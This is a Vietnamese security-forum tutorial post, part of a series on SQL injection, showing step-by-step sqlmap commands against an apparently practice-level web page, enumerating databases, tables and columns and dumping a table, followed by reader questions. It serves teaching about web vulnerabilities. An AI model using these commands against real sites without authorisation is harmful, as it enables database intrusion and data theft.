Web6: SQL Injection - Một Số Tool Khai Thác

WhiteHat.vn
  • Tin Tức Tin tức An ninh mạng Bản tin WhiteHat
  • Thành viên
  • Có gì mới
  • Video
  • Wargame
  • Vinh Danh
Đăng nhập

Tìm kiếm

Toàn bộ Chủ đề Diễn đàn này This thread Chỉ tìm trong tiêu đề Bởi: Tìm Tìm nâng cao…
  • Hoạt động gần đây
  • Đăng ký
WhiteHat.vn Đăng nhập Đăng ký Giới thiệu Liên hệ

CỘNG ĐỒNG AN NINH MẠNG VIỆT NAM

@ 2009 - 2021 Bkav Corporation

Install the app Install
  • Thảo luận
  • Web Security
You are using an out of date browser. It may not display this or other websites correctly.You should upgrade or use an alternative browser. Web6: SQL injection - Một số tool khai thác
  • Bắt đầu Mask
  • Ngày bắt đầu 20/02/2014
Chia sẻ: Facebook Twitter Reddit Pinterest Tumblr WhatsApp Email Chia sẻ Liên kết Mask

Mask

VIP Members
03/07/2013 33 25 bài viết Web6: SQL injection - Một số tool khai thác Web6: SQL injection - Một số tool khai thác Các chuyên đề nhỏ cùng chủ đề: Web1: SQL injection - Con đường khai thác phổ biến : qua “user input” Web2: SQL injection - Các con đường khai thác khác Web3: SQL injection - Kỹ thuật khai thác: Các hướng khai thác Web4: SQL injection - Kỹ thuật khai thác: Các bước khai thác Web5: SQL injection - Kỹ thuật khai thác: Một số kỹ thuật vượt qua cơ chế lọc Web6: SQL injection - Một số tools khai thác Web7: SQL injection - Các cách phòng chống & Kết luận. ============================================​ Một số tool khai thác Hiện nay có rất nhiều công cụ quét lỗ hổng bảo mật (bao gồm SQL injection). Những công cụ này cho phép phát hiện vào khai thác lỗ hổng SQL injection khá mạnh mẽ. Một số công cụ khai thác lỗ hổng SQL injection tự động hay được sử dụng như:
  • Sqlmap
  • The Mole (Digging up your data)
  • Havij
Dưới đây tôi sẽ demo việc sử dụng Sqlmap để khai thác SQL injection cơ bản. Bạn download Sqlmap tại http://sqlmap.org/ Sqlmap được viết bằng ngôn ngữ Python, vì vậy để sử dụng tool này bạn cần cài đặt Python. Bạn có thể download python tại http://www.python.org/downloads/ Đầu tiên bạn phải xác định được website mục tiêu, ở đây tôi có mục tiêu sau: http://zerocoolhf.altervista.org/level1.php?id=1 Bước 1: Mở cmd và gõ lệnh như sau: Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” sqlmap sẽ phát hiện lỗ hổng của mục tiêu vào đưa ra thông tin về lỗ hổng. 1490893000image1.JPG ​Bước 2: Khi đã xác định được là website mục tiêu tồn tại lỗ hổng SQL injection, ta tiến hành tìm tên cơ sở dữ liệu. Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs 1490893000image2.JPG =>Cơ sở dữ liệu: my_zerocoolhf Bước 3: Sau khi xác định được tên cơ sở dữ liệu, ta sẽ tìm tiếp tên các bảng có trong cơ sở dữ liệu. Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf 1490893000image3.JPG => Có 2 bảng trong cơ sở dữ liệu: auth và book Bước 4: Xác định tên các cột trong bảng Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book 1490893000image4.JPG => Xác định được các cột trong bảng book: author, id, price, title. Bước 5: Dump dữ liệu từ bảng. Mã: python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book 1490893000image5.JPG => Như vậy ta đã lấy được cơ sở dữ liệu của website mục tiêu. Trên đây là demo cơ bản về sử dụng sqlmap để khai thác lỗi SQL injection, các bạn có thể tìm hiểu thêm các tùy chọn của sqlmap tại https://github.com/sqlmapproject/sqlmap/wiki/Usage để hỗ trợ việc khai thác SQL injection. Chuyên đề tiếp theo - “W7: SQL injection – Các cách phòng chống & Kết luận” Chỉnh sửa lần cuối bởi người điều hành: 15/09/2014 anh ơi sao em không chạy được ạ , em nhập python .... thì bị lỗi Comment Dùng mã lệnh ko được ạ Comment Sao mình không xem được các web 3,4,5,7 vậy ạ Comment
Lanh_chien đã viết: Sao mình không xem được các web 3,4,5,7 vậy ạ Nhấn để mở rộng...
Web1: SQL injection - Con đường khai thác phổ biến: qua “user input”. Web2: SQL injection - Các con đường khai thác khác Web3: SQL injection - Các hướng khai thác Web4: SQL injection - Các bước khai thác Web5: SQL injection - Một số kỹ thuật vượt qua cơ chế lọc Web6: SQL injection - Một số tool khai thác Web7: SQL injection - Các cách phòng chống & kết luận Full không che nhé. Comment
sunny đã viết: Web1: SQL injection - Con đường khai thác phổ biến: qua “user input”. Web2: SQL injection - Các con đường khai thác khác Web3: SQL injection - Các hướng khai thác Web4: SQL injection - Các bước khai thác Web5: SQL injection - Một số kỹ thuật vượt qua cơ chế lọc Web6: SQL injection - Một số tool khai thác Web7: SQL injection - Các cách phòng chống & kết luận Full không che nhé. Nhấn để mở rộng...
oki. cảm ơn bạn nhìu Comment cho em hỏi cái id=1 là gì vậy ạ . Nó của cái gì và nếu với trang web khác thì tìm kiếm ntn ạ :"3 Comment Bạn phải đăng nhập hoặc đăng ký để phản hồi tại đây. Bài viết liên quan
  • Một vài cách vượt qua tường lửa ứng dụng web (WAF) để tìm lỗ hổng SQLi
    • Ngày bắt đầu 08/07/2019
    • 0
  • Tìm hiểu về SQL INJECTION và cách phòng chống
    • Ngày bắt đầu 25/10/2018
    • 0
  • sqli-labs: Các bài labs tuyệt vời để tìm hiểu lỗ hổng SQLi
    • Ngày bắt đầu 09/08/2018
    • 9
  • Python_gdork_sqli: công cụ tìm kiếm và khai thác lỗi sql injection
    • Ngày bắt đầu 11/08/2017
    • 2
  • [CMKT] Hướng dẫn khai thác sqli tự động trên win với BurpSuite và sqlmap
    • Ngày bắt đầu 02/07/2017
    • 8
  • Lỗ hổng SQLi mới phát hiện trên WP Statistics plugin !
    • Ngày bắt đầu 01/07/2017
    • 0
  • Bên trên

    Từ khóa » Tool Khai Thác Lỗi Sql Injection